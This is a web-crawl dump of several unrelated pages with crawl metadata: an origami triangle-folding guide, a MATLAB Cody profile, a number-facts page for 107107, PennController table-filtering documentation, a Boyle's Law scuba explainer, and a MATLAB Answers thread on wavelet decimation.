"https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_1.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_281164.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_4.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_156565.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_73391.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_7.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_310058.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_5.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_308603.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_115585.gif", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_545019.png", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_7.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_876753.jpg", null, "https://gmatclub.com/forum/images/verified_score.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/posts_bot.png", null, "https://www.facebook.com/tr", null, "https://www.googleadservices.com/pagead/conversion/1071875456/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8971982,"math_prob":0.95628023,"size":17118,"snap":"2020-24-2020-29","text_gpt3_token_len":5762,"char_repetition_ratio":0.23337619,"word_repetition_ratio":0.45399305,"special_character_ratio":0.3779063,"punctuation_ratio":0.1538649,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968326,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-13T15:24:20Z\",\"WARC-Record-ID\":\"<urn:uuid:e05cf605-4c8f-405e-b732-e31a6605e775>\",\"Content-Length\":\"987586\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d16b043c-38a0-4750-aaef-1c373d739f2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3af457-0684-4365-8f79-93c183054c6c>\",\"WARC-IP-Address\":\"198.11.238.99\",\"WARC-Target-URI\":\"https://gmatclub.com/forum/the-greatest-common-factor-of-16-and-the-positive-integer-n-109870.html?sort_by_oldest=true\",\"WARC-Payload-Digest\":\"sha1:SFMECUVXSQP7PEVZ7WQEJWJXHRAXTBRJ\",\"WARC-Block-Digest\":\"sha1:CURWFZ2S42KI7CFLI55YGHYYA5XUED5M\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657145436.64_warc_CC-MAIN-20200713131310-20200713161310-00435.warc.gz\"}"}
https://www.origami-resource-center.com/triangle-from-a-rectangle.html
[ "# Make a Triangle from a Rectangle", null, "Some origami models start with an equilateral triangle instead of a square sheet of paper. In this case, you need to make the triangular sheets of paper before you start. This page will show you how to get a triangle from a rectangular sheet of paper. If you are starting with a square sheet of paper, or a rectangle that is not quite long enough, then click here or here.", null, "#### Make a Triangle from a Rectangle\n\n1. Fold and unfold the rectangular sheet of paper in half lengthwise.\n\n2. Fold the top-right corner of the paper down so the corner meets the crease made in step 1 (join the dots). The crease made should intersect with the bottom-right corner.\n\n3. Fold left side of the paper over the flap made in step 2. Use the raw edge of the flap as a guide to position this fold.\n\n4. Unfold and cut along the creases to get an equilateral triangle. Easy." ]
[ null, "https://www.origami-resource-center.com/images/150xNxshape-Triangle-From-Rectangle-icon.jpg.pagespeed.ic.MM9UaeB2tO.jpg", null, "https://www.origami-resource-center.com/images/shape-Triangle-From-Rectangle.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8622032,"math_prob":0.8829964,"size":875,"snap":"2019-51-2020-05","text_gpt3_token_len":197,"char_repetition_ratio":0.1423651,"word_repetition_ratio":0.024691358,"special_character_ratio":0.216,"punctuation_ratio":0.07865169,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9522092,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-12T15:12:51Z\",\"WARC-Record-ID\":\"<urn:uuid:cb094df7-98e5-4ee7-8d54-c73613b97c19>\",\"Content-Length\":\"19022\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:63045cb7-8083-4092-aeab-0f506b703aad>\",\"WARC-Concurrent-To\":\"<urn:uuid:b73d49d7-4f5f-4ea8-8635-9998f202a73a>\",\"WARC-IP-Address\":\"173.247.218.162\",\"WARC-Target-URI\":\"https://www.origami-resource-center.com/triangle-from-a-rectangle.html\",\"WARC-Payload-Digest\":\"sha1:NJIWGIH47L2KJFQDTJC6FQHGJLMTNAEZ\",\"WARC-Block-Digest\":\"sha1:UELMESRB7JW7YTEYQ7WN3WJZMCAYPIMT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540543850.90_warc_CC-MAIN-20191212130009-20191212154009-00484.warc.gz\"}"}
https://in.mathworks.com/matlabcentral/profile/authors/14644008?detail=all
[ "Community Profile", null, "# Dev Gupta\n\nLast seen: 2 months ago Active since 2019\n\nLearner\n\n#### Statistics\n\n•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "#### Content Feed\n\nView by\n\nSolved\n\nDecimation\nWhen dealing to the Roman Army, the term decimate meant that the entire unit would be broken up into groups of ten soldiers, and...\n\n1 year ago\n\nSolved\n\nThere are 10 types of people in the world\nThose who know binary, and those who don't. The number 2015 is a palindrome in binary (11111011111 to be exact) Given a year...\n\n1 year ago\n\nSolved\n\nBinary numbers\nGiven a positive, scalar integer n, create a (2^n)-by-n double-precision matrix containing the binary numbers from 0 through 2^n...\n\n1 year ago\n\nSolved\n\nImplement a bubble sort technique and output the number of swaps required\nA bubble sort technique compares adjacent items and swaps them if they are in the wrong order. This is done recursively until al...\n\n1 year ago\n\nSolved\n\nDot Product\n\n1 year ago\n\nProblem\n\nDot Product\n\n1 year ago | 0 | 40 solvers\n\nSolved\n\nFinding peaks\nFind the peak values in the signal. The peak value is defined as the local maxima. For example, x= [1 12 3 2 7 0 3 1 19 7]; ...\n\n1 year ago\n\nSolved\n\nMax index of 3D array\nGiven a three dimensional array M(m,n,p) write a code that finds the three coordinates x,y,z of the Maximum value. Example ...\n\n1 year ago\n\nSolved\n\nReference Index Number\nGiven a reference set R of elements (each unique but identical in type), and a list V of elements drawn from the set R, possibly...\n\n1 year ago\n\nSolved\n\nSet a diagonal\nGiven a matrix M, row vector v of appropriate length, and diagonal index d (where 0 indicates the main diagonal and off-diagonal...\n\n1 year ago\n\nSolved\n\nCount consecutive 0's in between values of 1\nSo you have some vector that contains 1's and 0's, and the goal is to return a vector that gives the number of 0's between each ...\n\n1 year ago\n\nSolved\n\nCreate an n-by-n null matrix and fill with ones certain positions\nThe positions will be indicated by a z-by-2 matrix. Each row in this z-by-2 matrix will have the row and column in which a 1 has...\n\n1 year ago\n\nSolved\n\nGenerate Square Wave\nGenerate a square wave of desired length, number of complete cycles and duty cycle. Here, duty cycle is defined as the fraction ...\n\n1 year ago\n\nSolved\n\nBinary code (array)\nWrite a function which calculates the binary code of a number 'n' and gives the result as an array(vector). Example: Inpu...\n\n1 year ago\n\nSolved\n\nRelative ratio of \"1\" in binary number\nInput(n) is positive integer number Output(r) is (number of \"1\" in binary input) / (number of bits). Example: * n=0; r=...\n\n1 year ago\n\nSolved\n\nFind the longest sequence of 1's in a binary sequence.\nGiven a string such as s = '011110010000000100010111' find the length of the longest string of consecutive 1's. In this examp...\n\n1 year ago\n\nSolved\n\nGiven an unsigned integer x, find the largest y by rearranging the bits in x\nGiven an unsigned integer x, find the largest y by rearranging the bits in x. Example: Input x = 10 Output y is 12 ...\n\n1 year ago\n\nSolved\n\nBit Reversal\nGiven an unsigned integer _x_, convert it to binary with _n_ bits, reverse the order of the bits, and convert it back to an inte...\n\n1 year ago\n\nSolved\n\nConverting binary to decimals\nConvert binary to decimals. Example: 010111 = 23. 110000 = 48.\n\n1 year ago\n\nSolved\n\nFind out sum and carry of Binary adder\nFind out sum and carry of a binary adder if previous carry is given with two bits (x and y) for addition. Examples Previo...\n\n1 year ago\n\nSolved\n\n~~~~~~~ WAVE ~~~~~~~~~\n|The WAVE generator| Once upon a time there was a river. 'Sum' was passing by the river. He saw the water of the river that w...\n\n1 year ago\n\nSolved\n\nRemove the air bubbles\nGiven a matrix a, return a matrix b in which all the zeros have \"bubbled\" to the top. That is, any zeros in a given column shoul...\n\n1 year ago\n\nSolved\n\nFind Logic 32\n\n1 year ago\n\nProblem\n\nFind Logic 32\n\n1 year ago | 1 | 30 solvers\n\nSolved\n\nBack to basics 15 - classes\nCovering some basic topics I haven't seen elsewhere on Cody. Return the class of the input variable.\n\n1 year ago\n\nSolved\n\nFind Logic 31\n\n1 year ago\n\nProblem\n\nFind Logic 31\n\n1 year ago | 1 | 23 solvers\n\nSolved\n\nFind Logic 30\n\n1 year ago\n\nProblem\n\nFind Logic 30\n\n1 year ago | 1 | 24 solvers\n\nSolved\n\nPattern matching\nGiven a matrix, m-by-n, find all the rows that have the same \"increase, decrease, or stay same\" pattern going across the columns...\n\n1 year ago" ]
[ null, "https://in.mathworks.com/responsive_image/150/150/0/0/0/cache/matlabcentral/profiles/14644008_1548563151426_DEF.jpg", null, "https://in.mathworks.com/matlabcentral/profile/hunt/MLC_Treasure_Hunt_badge.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/famous.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/quiz_master.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/curator.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/mathworks_generic_group.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/community_authored_group.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/puzzler.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/promoter.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/speed_demon.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/creator.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/solver.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79330736,"math_prob":0.9373284,"size":4556,"snap":"2021-43-2021-49","text_gpt3_token_len":1267,"char_repetition_ratio":0.1761863,"word_repetition_ratio":0.075,"special_character_ratio":0.27238807,"punctuation_ratio":0.12345679,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99282527,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-03T17:14:51Z\",\"WARC-Record-ID\":\"<urn:uuid:387b782c-9418-4e60-b578-8866f67b63d9>\",\"Content-Length\":\"116930\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf2ab53c-666e-476e-89a0-e0ba7592b2c8>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b5ba5ce-12d9-4f5e-a459-0320ff77598a>\",\"WARC-IP-Address\":\"104.96.217.125\",\"WARC-Target-URI\":\"https://in.mathworks.com/matlabcentral/profile/authors/14644008?detail=all\",\"WARC-Payload-Digest\":\"sha1:6GOCNA23TCDCYK4C5B7V72C5VK5O4S67\",\"WARC-Block-Digest\":\"sha1:CVDBQHRXPTWRV2PAJ35WP7M47QUVHQGI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362891.54_warc_CC-MAIN-20211203151849-20211203181849-00064.warc.gz\"}"}
https://metanumbers.com/107107
[ "# 107107 (number)\n\n107,107 (one hundred seven thousand one hundred seven) is an odd six-digits composite number following 107106 and preceding 107108. In scientific notation, it is written as 1.07107 × 105. The sum of its digits is 16. It has a total of 4 prime factors and 16 positive divisors. There are 76,320 positive integers (up to 107107) that are relatively prime to 107107.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 6\n• Sum of Digits 16\n• Digital Root 7\n\n## Name\n\nShort name 107 thousand 107 one hundred seven thousand one hundred seven\n\n## Notation\n\nScientific notation 1.07107 × 105 107.107 × 103\n\n## Prime Factorization of 107107\n\nPrime Factorization 7 × 11 × 13 × 107\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 4 Total number of prime factors rad(n) 107107 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 107,107 is 7 × 11 × 13 × 107. Since it has a total of 4 prime factors, 107,107 is a composite number.\n\n## Divisors of 107107\n\n16 divisors\n\n Even divisors 0 16 8 8\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 16 Total number of the positive divisors of n σ(n) 145152 Sum of all the positive divisors of n s(n) 38045 Sum of the proper positive divisors of n A(n) 9072 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 327.272 Returns the nth root of the product of n divisors H(n) 11.8063 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 107,107 can be divided by 16 positive divisors (out of which 0 are even, and 16 are odd). The sum of these divisors (counting 107,107) is 145,152, the average is 9,072.\n\n## Other Arithmetic Functions (n = 107107)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 76320 Total number of positive integers not greater than n that are coprime to n λ(n) 3180 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 10176 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 76,320 positive integers (less than 107,107) that are coprime with 107,107. And there are approximately 10,176 prime numbers less than or equal to 107,107.\n\n## Divisibility of 107107\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 3 2 1 0 3 7\n\nThe number 107,107 is divisible by 7.\n\n## Classification of 107107\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (107107)\n\nBase System Value\n2 Binary 11010001001100011\n3 Ternary 12102220221\n4 Quaternary 122021203\n5 Quinary 11411412\n6 Senary 2143511\n8 Octal 321143\n10 Decimal 107107\n12 Duodecimal 51b97\n20 Vigesimal d7f7\n36 Base36 2an7\n\n## Basic calculations (n = 107107)\n\n### Multiplication\n\nn×y\n n×2 214214 321321 428428 535535\n\n### Division\n\nn÷y\n n÷2 53553.5 35702.3 26776.8 21421.4\n\n### Exponentiation\n\nny\n n2 11471909449 1228721805354043 131604706406055483601 14095785289033384682052307\n\n### Nth Root\n\ny√n\n 2√n 327.272 47.4904 18.0907 10.1383\n\n## 107107 as geometric shapes\n\n### Circle\n\n Diameter 214214 672973 3.60401e+10\n\n### Sphere\n\n Volume 5.14686e+15 1.4416e+11 672973\n\n### Square\n\nLength = n\n Perimeter 428428 1.14719e+10 151472\n\n### Cube\n\nLength = n\n Surface area 6.88315e+10 1.22872e+15 185515\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 321321 4.96748e+09 92757.4\n\n### Triangular Pyramid\n\nLength = n\n Surface area 1.98699e+10 1.44806e+14 87452.5\n\n## Cryptographic Hash Functions\n\nmd5 c39287d312d814d143e0a4d1051ffc91 784dbca81c93bb7cd57749a764d4be9e281f5a53 6d56d1763079f9ffbd233f182a18ac63d1bb433ca53b2fe4ea0d078c272f6e9a be3b747ce58a3410196682fa025b2d5af2360d9e73bb58ecade2f40049c2e3e11541bb04a3108b88eb6e67e49951d5dca6dedf2bd0c3f43e756179bda1e72976 03820e0ebdcb85358809d2feda139e83cba4ffa1" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60157067,"math_prob":0.97097677,"size":4616,"snap":"2021-43-2021-49","text_gpt3_token_len":1626,"char_repetition_ratio":0.120338246,"word_repetition_ratio":0.03660322,"special_character_ratio":0.45732236,"punctuation_ratio":0.07544757,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.996066,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T04:36:08Z\",\"WARC-Record-ID\":\"<urn:uuid:b3409f20-54bf-4adc-8df8-db53d1e141ce>\",\"Content-Length\":\"40227\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f45f9702-8a03-4d3f-aa5b-86b6c48ed706>\",\"WARC-Concurrent-To\":\"<urn:uuid:0de75a44-d490-4526-86e1-adccc47afe09>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/107107\",\"WARC-Payload-Digest\":\"sha1:HOQYONYO5QCKHSB7R7CHARNZ7DGK2DNA\",\"WARC-Block-Digest\":\"sha1:7PELVYX7DY35Z6CPJSSX2PYTUGWK2VFM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585561.4_warc_CC-MAIN-20211023033857-20211023063857-00071.warc.gz\"}"}
https://www.pcibex.net/wiki/penncontroller-gettable-filter/
[ "# PennController.GetTable().filterGlobal Commands\n\n`PennController.GetTable( tablename ).filter( \"column\" , \"match\" )`\n\nor `PennController.GetTable( tablename ).filter( \"column\" , /match/ )`\n\nor `PennController.GetTable( tablename ).filter( function )`\n\nReturns a filtered version of the table, containing only rows whose specified column’s value is a match.\n\nIf you use a string then the column’s value must match the text exactly. Alternatively, you can use a regular expression to test the column’s value. You can also use a function that will take each row as an argument and should return `true` to keep the row or `false` to exclude it.\n\nYou can use several `filter`s in chain.\n\nExample:\n\n```Template(\n.filter( row => row.Item > 0 ) // 'Item' should be greater than 0, and\n.filter( \"ButtonText\" , /second/ ) // 'ButtonText' should contain 'second'\n,\nrow => newTrial( \"button trial\" ,\nnewButton(\"test button\", row.ButtonText)\n.print()\n.wait()\n)\n.log( \"Item\" , row.Item )\n.log( \"Text\" , row.ButtonText )\n);\n```\n\nGenerates only one trial from a subset of the table spreadsheet.csv: first we only consider rows where the value in the Item column is a number greater than 0 (this is practically ineffective, for both rows in spreadsheet.csv already satisfy this condition) and we further consider only rows among those rows where the value of the ButtonText column is a text containing the string second (only the second row satisfies this condition)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67396504,"math_prob":0.7046261,"size":1405,"snap":"2021-04-2021-17","text_gpt3_token_len":327,"char_repetition_ratio":0.11848679,"word_repetition_ratio":0.018099548,"special_character_ratio":0.24412811,"punctuation_ratio":0.15564202,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96432245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-24T03:18:13Z\",\"WARC-Record-ID\":\"<urn:uuid:7d87aa76-3198-47f0-8c57-db0482aa3baf>\",\"Content-Length\":\"46457\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:950addd0-62f0-42f9-add4-b7d6697c40c0>\",\"WARC-Concurrent-To\":\"<urn:uuid:627a116a-ab29-469d-98d7-19ea66cdd1ec>\",\"WARC-IP-Address\":\"45.33.65.35\",\"WARC-Target-URI\":\"https://www.pcibex.net/wiki/penncontroller-gettable-filter/\",\"WARC-Payload-Digest\":\"sha1:7WCGLCAMVFGGB3EXFRZA6U7HQUQH2Y4E\",\"WARC-Block-Digest\":\"sha1:S4LFKQCXRYFYKZQFXXDDF2FVOTYTIM6N\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703544403.51_warc_CC-MAIN-20210124013637-20210124043637-00537.warc.gz\"}"}
https://www.downtoscuba.com/boyles-law-in-scuba-diving/
[ "", null, "One of the main concepts of physics explained in scuba diving is Boyle’s Law. At a glance, it is a simple expression of a pressure and volume relationship of gases. It can, however, get complex. For the purpose of this article, we are going to keep it simple. What exactly is the relationship between Boyle’s Law and scuba diving? And how does it affect us as scuba divers?\n\n## Boyle’s Law and Scuba Diving\n\nEven though Richard Towneley and Henry Power first noted the relationship between pressure and volume in the 17th century, it was Robert Boyle that confirmed their findings by conducting experiments. He reduced the volume of a closed gas container using mercury and noted the proportional relationship or pressure and volume.\n\nWe don’t have Mercury available. So what about a balloon? We have a closed container of gas. Now if we were to pull this balloon underwater, the water pressure increases linearly with depth. That means our flexible, closed system of gas (balloon) will decrease in volume the deeper we pull it.\n\nThis looks like this:\n\nDepth\n\nSurface\n\n10m\n\n20m\n\n30m\n\n40m\n\nPressure\n\n1 bar\n\n2 bar\n\n3 bar\n\n4 bar\n\n5 bar\n\nVolume\n\n1\n\n1/2\n\n1/3\n\n1/4\n\n1/5\n\nDensity\n\n1x\n\n2x\n\n3x\n\n4x\n\n5x\n\n## What is Boyle’s Law Formula\n\nNow that we know that we are talking about a law that describes the volume of a fixed amount of gas in a closed container when the pressure changes, we know we need pressure and volume as parameters in our formula.\n\nSo that leaves us with starting volume & starting pressure and leaves us with ending volume & ending pressure. Therefore this is what the Boyle’s Law formula is:\n\nP1V1 = P2V2\n\nWhere P1 is first pressure, V1 first volume and after the change we have P2 for the second pressure and V2 for the second volume.\n\nLet’s apply this formula to a dive where we take a balloon with us.\n\nThe balloon at the surface is 2.3 litres in volume and we are at the surface, so 1 bar of absolute pressure.\n\nWe want to dive to 32 meters with this balloon. Therefore, according to the Boyle’s law formula, we have:\n\nP1V1 = P2V2 and can therefore use V2 = P1V1 / P2\n\n(1*2.3) / 4.2 = 0.5476\n\nThis means that the new volume of the balloon at 32 meters depth would be about 0.55 liters.\n\nSince we don’t need to know exact volumes in scuba diving this is overkill. What we do need to understand is that the relationship of gas volume exposed to pressure is proportional. What does this mean for us as divers? For example, we need to add more physical air in order to achieve neutral buoyancy deeper. Furthermore, we cannot hold our breath and ascend. Knowing these facts is why you need to be certified in order to scuba dive.\n\nAs a result of gas volume decreasing with increased pressure, we also notice a gas’s density increase. Increased density in breathing gases leads to faster air consumption rates at depth." ]
[ null, "https://www.downtoscuba.com/wp-content/uploads/2020/03/what-is-boyles-law-696x464.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9388005,"math_prob":0.9515393,"size":2856,"snap":"2020-45-2020-50","text_gpt3_token_len":688,"char_repetition_ratio":0.13113604,"word_repetition_ratio":0.0,"special_character_ratio":0.23284313,"punctuation_ratio":0.087030716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97440827,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T20:53:56Z\",\"WARC-Record-ID\":\"<urn:uuid:f79dda8f-c8cd-4f86-8730-47f17c23c187>\",\"Content-Length\":\"177682\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8f809ad0-067e-40fa-9bf9-bc65ea9b5a56>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3bd76c8-8a4d-46e0-bbcf-be3de3e4d15a>\",\"WARC-IP-Address\":\"173.236.190.126\",\"WARC-Target-URI\":\"https://www.downtoscuba.com/boyles-law-in-scuba-diving/\",\"WARC-Payload-Digest\":\"sha1:EJ2GUMWEBU7SRY2NPDR3SFQGXU4I7R7J\",\"WARC-Block-Digest\":\"sha1:OQNMFCIN5IEB5JHCVOMF3Z3X367I5V7J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107900860.51_warc_CC-MAIN-20201028191655-20201028221655-00427.warc.gz\"}"}
https://ww2.mathworks.cn/matlabcentral/answers/352695-about-decimation-in-dwt
[ "16 views (last 30 days)\nAlexander Voznesensky on 14 Aug 2017\nEdited: Wayne King on 15 Aug 2017\nHi! I'm studying DWT by this link http://slideplayer.com/slide/4998644/. And I have 2 question (slide on 18.07):\n1. We should do decimation anyway: after LP-filter and after HP-filter. After LP-filter it's ok, but after HP-filter we will have an aliasing? Am I right? For ex: We have a signal with f1=100 Hz and f2=400 Hz. Fs=1000 Hz. After LP (0-250 Hz) we have subband with f1=100 Hz, Fs= 500. It's ok (f1<Fs/2). After HP (250-500 Hz) we have subband with f2=400 Hz, Fs= 500. It's not ok. Aliasing (f2>Fs/2)?\n2. How we can use only 2 filters in DWT? I don't understand, why the filters change their cut-off frequency when we use decimated signal? For ex: \"Therefore, if you calculated, say, a low-pass filter with a cutoff frequency of 10 MHz at a sampling frequency of 100 MHz, and then samples taken at a frequency of 10 GHz were applied to the input of this filter, the filter cutoff frequency would be 100 times larger, i.e., 1 GHz .\"\n\nWayne King on 14 Aug 2017\nEdited: Wayne King on 14 Aug 2017\nHi Alexander,\n1. Yes, you are correct that the downsampling causes aliasing (or can cause aliasing). However, the analysis filters and synthesis filters in the wavelet transform are designed in such a way that any aliasing is canceled upon reconstruction.\n2. You are only using two filters because you are using the so-called pyramid algorithm. You can think of the equivalent filters in terms of successive convolutions, but you should keep in the mind the so called Noble identities from multirate signal processing. That allows you to see the effect of interchanging downsampling with filtering (or on the synthesis, the effect of interchanging upsampling with filtering). Read up on the Noble identities, for one example, if you lowpass filter with the scaling filter, G(f), and then downsample by two followed by filtering with the wavelet filter, H(f) that is equivalent to the second-level wavelet coefficients (prior to decimating those by two). Schematically, that is X(f) -> G(f) -> downsample by two -> H(f). The noble identities will tell you that is equivalent to X(f) -> G(f)H(2f) -> downsample by two so the equivalent filter for the second-level wavelet coefficients is G(f)H(2f). Now let's look at that filter in MATLAB.\nN = 64;\n[G,H] = wfilters('sym4');\nGdft = fft(G,N);\nHdft = fft(H,N);\nH2 = Hdft(1+mod(2*(0:N-1),N));\nH2 = Gdft.*H2;\nNow let's plot Hdft (1st-level wavelet filter response) and H2 (second-level wavelet filter response)\nf = 0:1/N:1/2;\nplot(f,abs(Hdft(1:N/2+1)));\nhold on;\nplot(f,abs(H2(1:N/2+1)),'r');\nlegend('First Level Wavelet','Second Level Wavelet');\nxlim([0 1/2]);\ngrid on;\nxlabel('Cycles/Sample');\n\n#### 1 Comment\n\nAlexander Voznesensky on 14 Aug 2017\nThank you! I was trying to understand what you said. Here is the plot. I see, that we have a scaling effect. For ex, f=100 Hz (after deimation) corresponds to f=200 Hz (before decimation). I supose, this is the reason of using only 2 filters. We should multiply new frequences with factor M*level_number and then match them to original f-axis where we have filter's amplitude-frequency response. Formally this is understandable, but... Looks like a trick. Could you recommend some stuff about it?", null, "Wayne King on 15 Aug 2017\nEdited: Wayne King on 15 Aug 2017\nHi Alexander,\nI don't think there is a trick here. The filter responses scale as you go down in resolution but that is because the discrete wavelet transform uses L2 normalization so that the L2 norm is preserved. That is good for lots of applications, but not for others. For example, in the CWT we (and many others) believe that L1 normalization is better and that is why the CWT in MATLAB from 16b on uses L1 normalization.\nOne thing to keep in mind is that the downsampling at each level turns essentially half-band signals into full band signals, so we can say that (this is an approximation) the scaling coefficients at level 1 capture aspects of the data in the frequency interval (-1/4,1/4) while the wavelet coefficients capture information in (-1/2 -1/4) union (1/4,1/2). After downsampling both of these become full-band signals so they both have content over (-1/2, 1/2) but while the scaling coefficients maintain the frequency order, the wavelet coefficients actually map the frequencies in (1/4, 1/2) in reverse order. So a frequency in (1/4,1/2) gets mapped essentially to 2*(1/2-f) where f is the original signal. For example:\n% for the classic orthonormal 